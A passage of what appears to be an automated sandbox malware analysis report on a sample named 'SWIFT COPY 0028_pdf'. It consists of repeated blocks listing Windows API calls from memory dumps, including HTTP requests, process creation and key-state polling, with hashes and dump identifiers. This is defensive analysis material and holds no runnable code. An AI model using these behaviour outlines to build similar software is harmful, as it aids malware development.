                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 1704125052-3381328864
                                                                                    • Opcode ID: 6451e6cc91bb9ccf4649b1dbc80c23e76727a29efbad703c267c7170ffeb8947
                                                                                    • Instruction ID: 5d995a51ef4895e4da8aebdffe2406d785a7194286b30bbe397b1a7b9205496b
                                                                                    • Opcode Fuzzy Hash: 6451e6cc91bb9ccf4649b1dbc80c23e76727a29efbad703c267c7170ffeb8947
                                                                                    • Instruction Fuzzy Hash: CB11297664C703F9FA24AB35EC07DA6379CDFA1324B200122FE09E40D5FBE5A8555654
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0097B2D5
                                                                                    • CoInitialize.OLE32(00000000), ref: 0097B302
                                                                                    • CoUninitialize.OLE32 ref: 0097B30C
                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0097B40C
                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0097B539
                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0097B56D
                                                                                    • CoGetObject.OLE32(?,00000000,009AD91C,?), ref: 0097B590
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0097B5A3
                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0097B623
                                                                                    • VariantClear.OLEAUT32(009AD91C), ref: 0097B633
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2395222682-0
                                                                                    • Opcode ID: fc223910d5f0ff5bca6fc18465838301709b28d08d678a07bfcd37161d178640
                                                                                    • Instruction ID: ebe5e4b4ede3244dd2ca93f6351f7f33b5ae5ac390d91a245a858d8438eed659
                                                                                    • Opcode Fuzzy Hash: fc223910d5f0ff5bca6fc18465838301709b28d08d678a07bfcd37161d178640
                                                                                    • Instruction Fuzzy Hash: 4CC104B2608305AFC700DF68C884A6BB7E9BF89704F04895DF58ADB251DB71ED45CB92
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 0094ACC1
                                                                                      • Part of subcall function 00947CF4: __mtinitlocknum.LIBCMT ref: 00947D06
                                                                                      • Part of subcall function 00947CF4: EnterCriticalSection.KERNEL32(00000000,?,00947ADD,0000000D), ref: 00947D1F
                                                                                    • __calloc_crt.LIBCMT ref: 0094ACD2
                                                                                      • Part of subcall function 00946986: __calloc_impl.LIBCMT ref: 00946995
                                                                                      • Part of subcall function 00946986: Sleep.KERNEL32(00000000,000003BC,0093F507,?,0000000E), ref: 009469AC
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0094ACED
                                                                                    • GetStartupInfoW.KERNEL32(?,009D6E28,00000064,00945E91,009D6C70,00000014), ref: 0094AD46
                                                                                    • __calloc_crt.LIBCMT ref: 0094AD91
                                                                                    • GetFileType.KERNEL32(00000001), ref: 0094ADD8
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0094AE11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 1426640281-0
                                                                                    • Opcode ID: a4fc31a43be1946c882dece03ef4e1b96c2f02b100a7dbe38023ff765cbee02d
                                                                                    • Instruction ID: b51567f794d601cd40b39e77d7ae0ea8cd849c21d6a6f3435de0ce53a1550cd2
                                                                                    • Opcode Fuzzy Hash: a4fc31a43be1946c882dece03ef4e1b96c2f02b100a7dbe38023ff765cbee02d
                                                                                    • Instruction Fuzzy Hash: F281F5719453458FDB14CF68C8809AEBBF4AF4A324B24466DD4B6AB3D2C7349C03DB56
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 009667FD
                                                                                    • __swprintf.LIBCMT ref: 0096680A
                                                                                      • Part of subcall function 0094172B: __woutput_l.LIBCMT ref: 00941784
                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00966834
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00966840
                                                                                    • LockResource.KERNEL32(00000000), ref: 0096684D
                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0096686D
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0096687F
                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0096688E
                                                                                    • LockResource.KERNEL32(?), ref: 0096689A
                                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009668F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                    • String ID:
                                                                                    • API String ID: 1433390588-0
                                                                                    • Opcode ID: cd2790d29ef3e2c5ea387fa476453a61ee1306d5d6779af76eeca5e435c2c2ee
                                                                                    • Instruction ID: c9adeda7771e60394313d3e36f5ecb493ff0a564ac0e5e514f96845f01708ba6
                                                                                    • Opcode Fuzzy Hash: cd2790d29ef3e2c5ea387fa476453a61ee1306d5d6779af76eeca5e435c2c2ee
                                                                                    • Instruction Fuzzy Hash: 42318D7190525AABDB109F70DD85EBE7BACFF49341B008425F912E7150E734DD51EBA0
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 0093B496
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0093B4A0
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0093B4B5
                                                                                    • GetStockObject.GDI32(00000005), ref: 0093B4BD
                                                                                    • GetClientRect.USER32(?), ref: 0099DD63
                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0099DD7A
                                                                                    • GetWindowDC.USER32(?), ref: 0099DD86
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0099DD95
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0099DDA7
                                                                                    • GetSysColor.USER32(00000005), ref: 0099DDC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3430376129-0
                                                                                    • Opcode ID: 0df8cc1186eb892fea814f197786c54044367e0dafe6d9ddaba166bf48105047
                                                                                    • Instruction ID: 910ef90fc5a40ef54ed7badcfd868d922c495946a37673431b668942f95afda8
                                                                                    • Opcode Fuzzy Hash: 0df8cc1186eb892fea814f197786c54044367e0dafe6d9ddaba166bf48105047
                                                                                    • Instruction Fuzzy Hash: E0115B31519205EFDB216FB4EC48BE97B65EF06325F108625FA67954F2CB320941EF60
                                                                                    APIs
                                                                                    • EnumChildWindows.USER32(?,0095CF50), ref: 0095CE90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChildEnumWindows
                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                    • API String ID: 3555792229-1603158881
                                                                                    • Opcode ID: cd8f8319c91eec6417d657f240c30a6ae548a9d70368939ff9555c4dae505361
                                                                                    • Instruction ID: 68b83215f806a344897d1c68824921cdb70eaae3497567713776a62ca7f21814
                                                                                    • Opcode Fuzzy Hash: cd8f8319c91eec6417d657f240c30a6ae548a9d70368939ff9555c4dae505361
                                                                                    • Instruction Fuzzy Hash: 089170B0600706AECB18DFA1C482BEEFBB5BF45301F50851AD859A7291DF74A95ECBD0
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009230DC
                                                                                    • CoUninitialize.OLE32(?,00000000), ref: 00923181
                                                                                    • UnregisterHotKey.USER32(?), ref: 009232A9
                                                                                    • DestroyWindow.USER32(?), ref: 00995079
                                                                                    • FreeLibrary.KERNEL32(?), ref: 009950F8
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00995125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: 33037f1361b4234b64565bfdc113cf0b3c62a8f2ff4d696c687bc9063fde07b5
                                                                                    • Instruction ID: 95e802591ac5e04f1a3ebf0365afdb57a87d49f3689e56559495bcf85a4dda07
                                                                                    • Opcode Fuzzy Hash: 33037f1361b4234b64565bfdc113cf0b3c62a8f2ff4d696c687bc9063fde07b5
                                                                                    • Instruction Fuzzy Hash: 3B915C70611222CFCB15EF24E895B69F3B8FF45304F5581A9E40A67266CB34AE56CF50
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0093CC15
                                                                                      • Part of subcall function 0093CCCD: GetClientRect.USER32(?,?), ref: 0093CCF6
                                                                                      • Part of subcall function 0093CCCD: GetWindowRect.USER32(?,?), ref: 0093CD37
                                                                                      • Part of subcall function 0093CCCD: ScreenToClient.USER32(?,?), ref: 0093CD5F
                                                                                    • GetDC.USER32 ref: 0099D137
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0099D14A
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0099D158
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0099D16D
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0099D175
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0099D200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
APIs
  • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
  • Part of subcall function 0093B63C: GetCursorPos.USER32(000000FF), ref: 0093B64F
  • Part of subcall function 0093B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0093B66C
  • Part of subcall function 0093B63C: GetAsyncKeyState.USER32(00000001), ref: 0093B691
  • Part of subcall function 0093B63C: GetAsyncKeyState.USER32(00000002), ref: 0093B69F
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0098ED3C
• ImageList_EndDrag.COMCTL32 ref: 0098ED42
• ReleaseCapture.USER32 ref: 0098ED48
• SetWindowTextW.USER32(?,00000000), ref: 0098EDF0
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0098EE03
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0098EEDC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009745FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0097462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0097466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00974682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0097468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009746BF
• InternetCloseHandle.WININET(00000000), ref: 00974706
  • Part of subcall function 00975052: GetLastError.KERNEL32(?,?,009743CC,00000000,00000000,00000001), ref: 00975067
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,009BDC00), ref: 0097B715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,009BDC00), ref: 0097B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0097B8C1
• SysFreeString.OLEAUT32(?), ref: 0097B8EB
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 009824F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00982688
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009826AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009826EC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0098270E
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0098286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009828A1
• CloseHandle.KERNEL32(?), ref: 009828D0
• CloseHandle.KERNEL32(?), ref: 00982947
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0098B3F4
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0099DB1B
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0099DB3C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0099DB51
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0099DB6E
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0099DB95
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,0093A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0099DBA0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0099DBBD
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,0093A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0099DBC8
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
APIs
  • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00965FA6,?), ref: 00966ED8
  • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00965FA6,?), ref: 00966EF1
  • Part of subcall function 009672CB: GetFileAttributesW.KERNEL32(?,00966019), ref: 009672CC
• lstrcmpiW.KERNEL32(?,?), ref: 009675CA
• _wcscmp.LIBCMT ref: 009675E2
• MoveFileW.KERNEL32(?,?), ref: 009675FB
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0099DAD1,00000004,00000000,00000000), ref: 0093EAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0099DAD1,00000004,00000000,00000000), ref: 0093EB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0099DAD1,00000004,00000000,00000000), ref: 0099DC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0099DAD1,00000004,00000000,00000000), ref: 0099DCF2
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
                                                                                    • Opcode ID: f3f11be37bb19e176588460f8fc3b77631a40afa94b152dc3e6fb75a4650abb9
                                                                                    • Instruction ID: d72a6f57d406f33bf3aeed7c2df6c7ee45e1c4500aa9fdf468ee50a59112b569
                                                                                    • Opcode Fuzzy Hash: f3f11be37bb19e176588460f8fc3b77631a40afa94b152dc3e6fb75a4650abb9
                                                                                    • Instruction Fuzzy Hash: A741DB7021A2809BDF3A4B2A8DCDB66BAADAF52304F19080DF087869E1D7757C40DF51
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0095AEF1,00000B00,?,?), ref: 0095B26C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,0095AEF1,00000B00,?,?), ref: 0095B273
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0095AEF1,00000B00,?,?), ref: 0095B288
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0095AEF1,00000B00,?,?), ref: 0095B290
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0095AEF1,00000B00,?,?), ref: 0095B293
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0095AEF1,00000B00,?,?), ref: 0095B2A3
                                                                                    • GetCurrentProcess.KERNEL32(0095AEF1,00000000,?,0095AEF1,00000B00,?,?), ref: 0095B2AB
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0095AEF1,00000B00,?,?), ref: 0095B2AE
                                                                                    • CreateThread.KERNEL32(00000000,00000000,0095B2D4,00000000,00000000,00000000), ref: 0095B2C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
